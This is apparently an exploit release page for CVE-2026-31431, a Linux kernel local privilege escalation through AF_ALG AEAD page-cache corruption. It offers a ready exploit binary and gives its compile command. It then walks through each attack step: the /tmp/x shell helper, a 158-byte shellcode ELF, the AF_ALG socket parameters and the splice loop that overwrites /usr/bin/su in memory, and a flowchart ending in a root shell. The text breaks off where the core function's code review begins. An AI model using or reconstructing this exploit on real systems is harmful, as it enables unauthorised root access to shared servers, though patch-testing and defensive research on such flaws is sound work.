
Working proof-of-concept exploit for CVE-2026-31431, a Linux kernel local privilege escalation via AF_ALG AEAD page cache corruption, granting root shell.
2026-04-29 — I am publishing this exploit one day after sharing it on the MyDigitalLife forum. It does not require Python; it is written in C and compiled to the smallest possible size using:
musl-gcc -static -Os -o exploit exploit.c -sCritical threat. The exploit binary is compiled without dependencies and can be used to test for vulnerabilities on any Linux system
CVE-2026-31431 is a NIST-confirmed vulnerability in the Linux kernel that allows an unprivileged local user to obtain a
rootshell in seconds. In light of the publicly circulating exploit for CVE-2026-31431, I have developed a binary proof-of-concept (PoC) to evaluate the exposure of our internal infrastructure. While some environments restrict the use of su, this vulnerability is particularly critical for shared servers because it targets the underlying kernel memory management. Consequently, any SETUID binary—including sudo, passwd, mount, or newgrp—can be leveraged to trigger the exploit and grant a root shell. Administrative action to patch the kernel is required immediately, as standard user-space restrictions are insufficient to mitigate this threat. Any Linux system running an unpatched kernel is at risk.
My Own Working Exploit · Linux Kernel · AF_ALG cryptographic interface (AEAD)
Replaces /usr/bin/su in the kernel page cache without touching the on-disk file
Local shell access is sufficient — no additional privileges required
Affects unpatched Linux distributions

CVE-2026-31431 is a bug in the handling of scatter-gather I/O operations and page cache references in the Linux kernel cryptographic subsystem — specifically in the AF_ALG socket implementation for AEAD algorithms (crypto/af_alg.c, crypto/aead.c).
| Property | Value |
|---|---|
| Identifier | CVE-2026-31431 |
| Reference | NIST NVD |
| Type | Local Privilege Escalation (LPE) |
| Component | Linux Kernel — AF_ALG / AEAD (authencesn) |
| Required access | Unprivileged local user |
| Impact | Interactive root shell |
| Exploit status | Working PoC publicly available on GitHub |
| Persistence | None — modification exists in RAM only; reboot restores the original state |
The Linux kernel exposes a cryptographic interface to user space through AF_ALG sockets. The vulnerability lies in the fact that during an AEAD decryption operation, the kernel incorrectly maps the decryption output directly onto the page cache pages of the source file — instead of a temporary buffer. An attacker can thereby overwrite the in-memory content of any file without modifying it on disk, without root privileges, and without leaving any visible trace in the filesystem.
| System | Status |
|---|---|
| Ubuntu 24.04 (bare metal / VM) | ⚠️ Vulnerable on unpatched kernel |
| Debian, Fedora, Arch on unpatched kernel | ⚠️ Vulnerable |
Distributions with CONFIG_SECURITY_LOCKDOWN_LSM | ✅ Likely protected |
Systems with nosuid or ProtectSUID (systemd) | ✅ Protected |
Systems with AppArmor/SELinux blocking AF_ALG | ✅ Protected |
| macOS, Windows (native) | ✅ Not affected |
The exploit consists of two components: a helper script at /tmp/x and a corruption loop based on AF_ALG. The following is an exact walkthrough based on source code analysis:
1. Helper script setup
The exploit creates /tmp/x with the following content:
#!/bin/sh
export TERM=xterm-256color
exec /bin/sh
It sets permissions to 0755. The reason: /usr/bin/su strips environment variables (including TERM) on launch. The helper script restores them before spawning the real shell, ensuring a functional terminal.
2. ELF payload construction
A minimal 158-byte x86_64 ELF binary containing raw shellcode is built in memory. The string /bin/sh at offset 150 is then patched to /tmp/x\0 via memcmp/memcpy. See ELF Payload for details.
3. Opening /usr/bin/su read-only
int su_fd = open("/usr/bin/su", O_RDONLY);
The file is opened read-only — the exploit requires no write permissions whatsoever.
4. Corruption loop — 39 iterations of 4 bytes each
The payload (158 bytes) is processed in 4-byte chunks (39 complete chunks). Each chunk is passed through corrupt_binary_chunk(), which performs:
AF_ALG socket (SOCK_SEQPACKET)authencesn(hmac(sha256),cbc(aes)) — a compound AEAD algorithmop_sock)sendmsg with an 8-byte buffer (4× 'A' + 4 payload bytes) and three CMSGs: ALG_OP_DECRYPT, IV (20 bytes), assoclen=8splice: su_fd → pipe → op_sock (zero-copy through the kernel)recv() — this is where the kernel erroneously overwrites the page cache5. Execution
execve("/usr/bin/su", args, NULL);
The kernel loads /usr/bin/su through the page cache — which is now poisoned. The SUID bit (chmod u+s) is intact, so the kernel executes the file as root. The shellcode runs setuid(0) → execve("/tmp/x") → interactive root shell.
flowchart TD
A[Unprivileged local user] --> B["Creates /tmp/x helper script\nchmod 0755"]
B --> C["Builds 158-byte ELF payload\nPatch: /bin/sh → /tmp/x"]
C --> D["open /usr/bin/su O_RDONLY\nNo write permissions needed"]
D --> E[Loop: 39 chunks of 4 bytes]
E --> F[socket AF_ALG SOCK_SEQPACKET]
F --> G["bind: authencesn hmac sha256 cbc aes"]
G --> H["setsockopt: 72B key + authsize=4"]
H --> I[accept → op_sock]
I --> J["sendmsg: 8B data + 3x CMSG\nDECRYPT / IV 20B / assoclen=8"]
J --> K["splice: su_fd → pipe → op_sock\nzero-copy through kernel"]
K --> L[recv → finalise AEAD operation]
L --> M["KERNEL BUG: decryption output\noverwrites page cache of su_fd"]
M --> N{Next chunk?}
N -->|Yes| E
N -->|No| O["execve /usr/bin/su"]
O --> P["Kernel loads /usr/bin/su\nfrom poisoned page cache"]
P --> Q["SUID bit intact\nkernel executes as root"]
Q --> R["Shellcode: setuid 0 syscall 105"]
R --> S["execve /tmp/x syscall 59"]
S --> T[Interactive root shell]
Key sections of exploit.c reviewed below:
corrupt_binary_chunk() functionThe heart of the exploit. Each call coordinates one complete AF_ALG transaction: